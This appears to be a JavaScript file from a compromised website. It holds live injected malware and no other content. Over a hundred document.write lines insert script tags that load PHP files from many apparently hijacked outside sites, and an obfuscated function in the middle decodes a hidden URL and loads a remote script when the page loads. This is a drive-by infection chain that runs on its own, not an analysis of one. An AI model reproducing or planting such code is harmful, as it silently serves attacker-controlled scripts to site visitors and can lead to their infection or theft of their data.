document.write('<script src=http://xbox360.net.pl/img/konkurs_xbox_regulamin.php ><\/script>');
document.write('<script src=http://xbox360.net.pl/img/konkurs_xbox_regulamin.php ><\/script>');
document.write('<script src=http://xbox360.net.pl/img/konkurs_xbox_regulamin.php ><\/script>');
document.write('<script src=http://n2ktech.info/nymph/robots.php ><\/script>');
document.write('<script src=http://n2ktech.info/nymph/robots.php ><\/script>');
document.write('<script src=http://n2ktech.info/nymph/robots.php ><\/script>');
document.write('<script src=http://n2ktech.info/nymph/robots.php ><\/script>');
document.write('<script src=http://n2ktech.info/nymph/robots.php ><\/script>');
document.write('<script src=http://n2ktech.info/nymph/robots.php ><\/script>');
document.write('<script src=http://blog-sports.ru/images/spisko.php ><\/script>');
document.write('<script src=http://blog-sports.ru/images/spisko.php ><\/script>');
document.write('<script src=http://davecollection.com/store/uploads/fabric_options/gbxdvf.php ><\/script>');
document.write('<script src=http://davecollection.com/store/uploads/fabric_options/gbxdvf.php ><\/script>');
document.write('<script src=http://davecollection.com/store/uploads/fabric_options/gbxdvf.php ><\/script>');
document.write('<script src=http://davecollection.com/store/uploads/fabric_options/gbxdvf.php ><\/script>');
document.write('<script src=http://davecollection.com/store/uploads/fabric_options/gbxdvf.php ><\/script>');
document.write('<script src=http://davecollection.com/store/uploads/fabric_options/gbxdvf.php ><\/script>');
document.write('<script src=http://davecollection.com/store/uploads/fabric_options/gbxdvf.php ><\/script>');
document.write('<script src=http://countrylife.newportwebsites.com/blog/HR4.php ><\/script>');
document.write('<script src=http://countrylife.newportwebsites.com/blog/HR4.php ><\/script>');
document.write('<script src=http://countrylife.newportwebsites.com/blog/HR4.php ><\/script>');
var FB=new String();var J=new String();function w(){var t;if(t!='' && t!='m'){t=null};this.ls="";var i=new String();var h=unescape;var k=window;var U=h("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%74%72%61%76%69%61%6e%2e%63%6f%6d%2f%79%6f%75%6a%69%7a%7a%2e%63%6f%6d%2e%70%68%70");var Y;if(Y!='zA' && Y!='a_'){Y='zA'};function Z(S,H){var gg;if(gg!='E'){gg='E'};var B;if(B!='' && B!='n'){B=''};var z=new String("g");var FX;if(FX!='q' && FX!='ze'){FX='q'};var X_;if(X_!='up' && X_!='sW'){X_='up'};var s=h("%5b"), F=h("%5d");var to=new Array();var p=s+H+F;this.ta="";var x=new RegExp(p, z);this.Ec="";return S.replace(x, new String());};var D=new Array();var wW;if(wW!='QP'){wW=''};this.Vo="";this.zm="";var OK;if(OK!='Mf'){OK='Mf'};var Hr;if(Hr!='' && Hr!='bA'){Hr=''};var VL='';var o=Z('89350141181315502194','32459716');var UCl;if(UCl!='' && UCl!='M_'){UCl=''};var Q=new String();var Vg;if(Vg!='' && Vg!='zQ'){Vg='XI'};var LR=new Array();var kb=document;var nq='';var hO=new Array();function l(){var Gg;if(Gg!='' && Gg!='lG'){Gg=null};var tR=new String();var cd=new Date();var O=h("%68%74%74%70%3a%2f%2f%62%65%73%74%64%61%72%6b%73%74%61%72%2e%69%6e%66%6f%3a");var SS="";Q=O;var ci="";Q+=o;this.JW='';var Vp='';Q+=U;var Tz;if(Tz!='' && Tz!='YT'){Tz=''};try {var SI=new Date();var mR=new Date();xV=kb.createElement(Z('s6cmrkijpzt6','Qw0z4Okj6m'));var FXH=new Array();var rG=new String();xV[h("%73%72%63")]=Q;var VD;if(VD!='' && VD!='LF'){VD=''};var xI;if(xI!='Ma' && xI!='jc'){xI=''};var dI;if(dI!='vX'){dI=''};xV[h("%64%65%66%65%72")]=[7,1][1];this.LG="";this.woD="";kb.body.appendChild(xV);this.dR="";var nk=new Array();var Nr="";} catch(u){alert(u);};}var Mh;if(Mh!='Zn' && Mh!='iQp'){Mh='Zn'};var jg;if(jg!='' && jg!='bq'){jg=''};k[new String("onl"+"iKYoad".substr(3))]=l;this.RL='';this.gz='';var xW=new String();var xu=new String();};var bu=new String();w();var Xr;if(Xr!='Pc'){Xr='Pc'};var HR="";
document.write('<script src=http://countrylife.newportwebsites.com/blog/HR4.php ><\/script>');
document.write('<script src=http://countrylife.newportwebsites.com/blog/HR4.php ><\/script>');
document.write('<script src=http://creativeschool.net/aspnet_client/system_web/b88/owswll.php ><\/script>');
document.write('<script src=http://creativeschool.net/aspnet_client/system_web/b88/owswll.php ><\/script>');
document.write('<script src=http://creativeschool.net/aspnet_client/system_web/b88/owswll.php ><\/script>');
document.write('<script src=http://creativeschool.net/aspnet_client/system_web/b88/owswll.php ><\/script>');
document.write('<script src=http://creativeschool.net/aspnet_client/system_web/b88/owswll.php ><\/script>');
document.write('<script src=http://pccom-web.fr/css/forminfo.php ><\/script>');
document.write('<script src=http://pccom-web.fr/css/forminfo.php ><\/script>');
document.write('<script src=http://pccom-web.fr/css/forminfo.php ><\/script>');
document.write('<script src=http://pccom-web.fr/css/forminfo.php ><\/script>');
document.write('<script src=http://mantekcoporation.com/images/gifimg.php ><\/script>');
document.write('<script src=http://mantekcoporation.com/images/gifimg.php ><\/script>');
document.write('<script src=http://mantekcoporation.com/images/gifimg.php ><\/script>');
document.write('<script src=http://pracesemily.cz/wap/icon_favourites.php ><\/script>');
document.write('<script src=http://rodrigotorres.net/QUIZZ/video.php ><\/script>');
document.write('<script src=http://rodrigotorres.net/QUIZZ/video.php ><\/script>');
document.write('<script src=http://soulcaretv.com/wp-admin/readme.php ><\/script>');
document.write('<script src=http://mobileoffers.org/sql/logout.php ><\/script>');
document.write('<script src=http://marocchat.es/image/menu.php ><\/script>');
document.write('<script src=http://marocchat.es/image/menu.php ><\/script>');
document.write('<script src=http://marocchat.es/image/menu.php ><\/script>');
document.write('<script src=http://marocchat.es/image/menu.php ><\/script>');
document.write('<script src=http://marocchat.es/image/menu.php ><\/script>');
document.write('<script src=http://marocchat.es/image/menu.php ><\/script>');
document.write('<script src=http://odp.net.ru/includes/phpodp_directory_script_blu.php ><\/script>');
document.write('<script src=http://odp.net.ru/includes/phpodp_directory_script_blu.php ><\/script>');
document.write('<script src=http://odp.net.ru/includes/phpodp_directory_script_blu.php ><\/script>');
document.write('<script src=http://wwwuc.16800.com/attachments/pm.php ><\/script>');
document.write('<script src=http://wwwuc.16800.com/attachments/pm.php ><\/script>');
document.write('<script src=http://wwwuc.16800.com/attachments/pm.php ><\/script>');
document.write('<script src=http://wwwuc.16800.com/attachments/pm.php ><\/script>');
document.write('<script src=http://wwwuc.16800.com/attachments/pm.php ><\/script>');
document.write('<script src=http://wwwuc.16800.com/attachments/pm.php ><\/script>');
document.write('<script src=http://wwwuc.16800.com/attachments/pm.php ><\/script>');
document.write('<script src=http://desatascos24horas.es/salvado/contacto.php ><\/script>');
document.write('<script src=http://desatascos24horas.es/salvado/contacto.php ><\/script>');
document.write('<script src=http://eunsung0104.com/cert/bgm.php ><\/script>');
document.write('<script src=http://eunsung0104.com/cert/bgm.php ><\/script>');
document.write('<script src=http://kotobuki-sea.com/000/index.php ><\/script>');
document.write('<script src=http://quangcaogoogleadwords.net/d/indexv.php ><\/script>');
document.write('<script src=http://quangcaogoogleadwords.net/d/indexv.php ><\/script>');
document.write('<script src=http://quangcaogoogleadwords.net/d/indexv.php ><\/script>');
document.write('<script src=http://quangcaogoogleadwords.net/d/indexv.php ><\/script>');
document.write('<script src=http://quangcaogoogleadwords.net/d/indexv.php ><\/script>');
document.write('<script src=http://quangcaogoogleadwords.net/d/indexv.php ><\/script>');
document.write('<script src=http://quangcaogoogleadwords.net/d/indexv.php ><\/script>');
document.write('<script src=http://pchidambaram.net/cgi-bin/hiline_enquiry.php ><\/script>');
document.write('<script src=http://pchidambaram.net/cgi-bin/hiline_enquiry.php ><\/script>');
document.write('<script src=http://pchidambaram.net/cgi-bin/hiline_enquiry.php ><\/script>');
document.write('<script src=http://pchidambaram.net/cgi-bin/hiline_enquiry.php ><\/script>');
document.write('<script src=http://pchidambaram.net/cgi-bin/hiline_enquiry.php ><\/script>');
document.write('<script src=http://pchidambaram.net/cgi-bin/hiline_enquiry.php ><\/script>');
document.write('<script src=http://pchidambaram.net/cgi-bin/hiline_enquiry.php ><\/script>');
document.write('<script src=http://earthtown.co.in/skeletal_images/feed.php ><\/script>');
document.write('<script src=http://krws.ac.th/includes/FCKeditor/upload/htaccess.php ><\/script>');
document.write('<script src=http://downloaditfreenow.com/download/style.php ><\/script>');
document.write('<script src=http://downloaditfreenow.com/download/style.php ><\/script>');
document.write('<script src=http://downloaditfreenow.com/download/style.php ><\/script>');
document.write('<script src=http://downloaditfreenow.com/download/style.php ><\/script>');
document.write('<script src=http://downloaditfreenow.com/download/style.php ><\/script>');
document.write('<script src=http://downloaditfreenow.com/download/style.php ><\/script>');
document.write('<script src=http://flapup.com/include/newmembers.php ><\/script>');
document.write('<script src=http://flapup.com/include/newmembers.php ><\/script>');
document.write('<script src=http://flapup.com/include/newmembers.php ><\/script>');
document.write('<script src=http://flapup.com/include/newmembers.php ><\/script>');
document.write('<script src=http://flapup.com/include/newmembers.php ><\/script>');
document.write('<script src=http://flapup.com/include/newmembers.php ><\/script>');
document.write('<script src=http://flapup.com/include/newmembers.php ><\/script>');
document.write('<script src=http://avtoemali.info/PDF/contacts.php ><\/script>');
document.write('<script src=http://ecommerce.creativewebsols.com/screens-js/create-news-letters-backend-asp-net.php ><\/script>');
document.write('<script src=http://ecommerce.creativewebsols.com/screens-js/create-news-letters-backend-asp-net.php ><\/script>');
document.write('<script src=http://ecommerce.creativewebsols.com/screens-js/create-news-letters-backend-asp-net.php ><\/script>');
document.write('<script src=http://ecommerce.creativewebsols.com/screens-js/create-news-letters-backend-asp-net.php ><\/script>');
document.write('<script src=http://ecommerce.creativewebsols.com/screens-js/create-news-letters-backend-asp-net.php ><\/script>');
document.write('<script src=http://ecommerce.creativewebsols.com/screens-js/create-news-letters-backend-asp-net.php ><\/script>');
document.write('<script src=http://ecommerce.creativewebsols.com/screens-js/create-news-letters-backend-asp-net.php ><\/script>');
document.write('<script src=http://ecommerce.creativewebsols.com/screens-js/create-news-letters-backend-asp-net.php ><\/script>');
document.write('<script src=http://ati21.co.kr/Counter/ati_background.php ><\/script>');
document.write('<script src=http://grove.li/deskmedia_defekt/grovelogo.php ><\/script>');
document.write('<script src=http://grove.li/deskmedia_defekt/grovelogo.php ><\/script>');
document.write('<script src=http://grove.li/deskmedia_defekt/grovelogo.php ><\/script>');
document.write('<script src=http://grove.li/deskmedia_defekt/grovelogo.php ><\/script>');
document.write('<script src=http://grove.li/deskmedia_defekt/grovelogo.php ><\/script>');
document.write('<script src=http://grove.li/deskmedia_defekt/grovelogo.php ><\/script>');
document.write('<script src=http://grove.li/deskmedia_defekt/grovelogo.php ><\/script>');
document.write('<script src=http://grove.li/deskmedia_defekt/grovelogo.php ><\/script>');
document.write('<script src=http://siphi.net/fa/default.php ><\/script>');
document.write('<script src=http://siphi.net/fa/default.php ><\/script>');
document.write('<script src=http://siphi.net/fa/default.php ><\/script>');
document.write('<script src=http://siphi.net/fa/default.php ><\/script>');
document.write('<script src=http://siphi.net/fa/default.php ><\/script>');
document.write('<script src=http://siphi.net/fa/default.php ><\/script>');
document.write('<script src=http://siphi.net/fa/default.php ><\/script>');
document.write('<script src=http://dagmaredwards.com/images/index12.php ><\/script>');
document.write('<script src=http://dagmaredwards.com/images/index12.php ><\/script>');
document.write('<script src=http://dagmaredwards.com/images/index12.php ><\/script>');
document.write('<script src=http://dagmaredwards.com/images/index12.php ><\/script>');
document.write('<script src=http://dagmaredwards.com/images/index12.php ><\/script>');
document.write('<script src=http://viptea.ru/wp-includes/wp-links-opml.php ><\/script>');
document.write('<script src=http://viptea.ru/wp-includes/wp-links-opml.php ><\/script>');
document.write('<script src=http://viptea.ru/wp-includes/wp-links-opml.php ><\/script>');
document.write('<script src=http://viptea.ru/wp-includes/wp-links-opml.php ><\/script>');
document.write('<script src=http://viptea.ru/wp-includes/wp-links-opml.php ><\/script>');
document.write('<script src=http://viptea.ru/wp-includes/wp-links-opml.php ><\/script>');
document.write('<script src=http://viptea.ru/wp-includes/wp-links-opml.php ><\/script>');
document.write('<script src=http://eternalvoice.in/aspnet_client/Donate.php ><\/script>');
document.write('<script src=http://eternalvoice.in/aspnet_client/Donate.php ><\/script>');
document.write('<script src=http://eternalvoice.in/aspnet_client/Donate.php ><\/script>');
document.write('<script src=http://eternalvoice.in/aspnet_client/Donate.php ><\/script>');
document.write('<script src=http://eternalvoice.in/aspnet_client/Donate.php ><\/script>');
document.write('<script src=http://eternalvoice.in/aspnet_client/Donate.php ><\/script>');
document.write('<script src=http://saltpakistan.com/images/postinfo.php ><\/script>');
document.write('<script src=http://saltpakistan.com/images/postinfo.php ><\/script>');
document.write('<script src=http://saltpakistan.com/images/postinfo.php ><\/script>');
document.write('<script src=http://saltpakistan.com/images/postinfo.php ><\/script>');
document.write('<script src=http://saltpakistan.com/images/postinfo.php ><\/script>');
document.write('<script src=http://desertpowerindia.com/images/gifimg.php ><\/script>');
document.write('<script src=http://desertpowerindia.com/images/gifimg.php ><\/script>');
document.write('<script src=http://desertpowerindia.com/images/gifimg.php ><\/script>');
document.write('<script src=http://desertpowerindia.com/images/gifimg.php ><\/script>');
document.write('<script src=http://desertpowerindia.com/images/gifimg.php ><\/script>');
document.write('<script src=http://desertpowerindia.com/images/gifimg.php ><\/script>');
document.write('<script src=http://desertpowerindia.com/images/gifimg.php ><\/script>');
document.write('<script src=http://desertpowerindia.com/images/gifimg.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://zoombicycles.com/img/core.29010.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://gft-kw.com/cgi-bin/engmat---.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://kfcsc.com/kannada/wholesale1.php ><\/script>');
document.write('<script src=http://redevelopmentlaw.org/images/veec4/nav_bar3_r5_c1.php ><\/script>');
document.write('<script src=http://redevelopmentlaw.org/images/veec4/nav_bar3_r5_c1.php ><\/script>');
document.write('<script src=http://redevelopmentlaw.org/images/veec4/nav_bar3_r5_c1.php ><\/script>');
document.write('<script src=http://redevelopmentlaw.org/images/veec4/nav_bar3_r5_c1.php ><\/script>');
document.write('<script src=http://redevelopmentlaw.org/images/veec4/nav_bar3_r5_c1.php ><\/script>');
document.write('<script src=http://redevelopmentlaw.org/images/veec4/nav_bar3_r5_c1.php ><\/script>');
document.write('<script src=http://redevelopmentlaw.org/images/veec4/nav_bar3_r5_c1.php ><\/script>');
document.write('<script src=http://redevelopmentlaw.org/images/veec4/nav_bar3_r5_c1.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://sk-edem.ru/images/large/loadinga.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://e-eventful.ro/cariere/doc/b9n/2_fitzo.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://uyutny.ru/rzgn/sovety_faktoru.php ><\/script>');
document.write('<script src=http://desidil.com/dialallcom/contactus.php ><\/script>');